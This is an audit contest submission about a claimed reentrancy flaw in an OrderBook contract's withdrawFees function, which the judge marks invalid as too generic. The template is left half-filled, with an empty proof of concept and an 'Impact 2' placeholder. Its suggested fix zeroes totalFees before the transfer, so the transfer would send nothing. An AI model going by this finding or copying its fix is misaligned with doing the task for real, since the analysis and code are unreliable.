OrderBook

First Flight #43
Beginner FriendlySolidity
100 EXP
View results
Submission Details
Impact: medium
Likelihood: low
Invalid

withdraw fees doesn't follow CEI pattern.

Root + Impact CEI pattern is not followed

Description

  • withDrawFees() function doesn't follow cei patter

  • Vulnerable to reentrancy

// Root cause in the codebase with @> marks to highlight the relevant section
function withdrawFees(address _to) external onlyOwner {
if (totalFees == 0) {
revert InvalidAmount();
}
if (_to == address(0)) {
revert InvalidAddress();
}
iUSDC.safeTransfer(_to, totalFees);
@> totalFees = 0;
emit FeesWithdrawn(_to);
}

Risk

Likelihood:

  • onlyOwner makes exploitation unlikely, but not impossible (if ownership is compromised).


Impact:

  • If iUSDC were a malicious ERC20 token with a hook in transfer, it could reenter the contract.

  • Impact 2

Proof of Concept

Recommended Mitigation

- iUSDC.safeTransfer(_to, totalFees);
+ totalFees = 0;
+ iUSDC.safeTransfer(_to, totalFees);
Updates

Lead Judging Commences

yeahchibyke Lead Judge about 1 month ago
Submission Judgement Published
Invalidated
Reason: Too generic

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.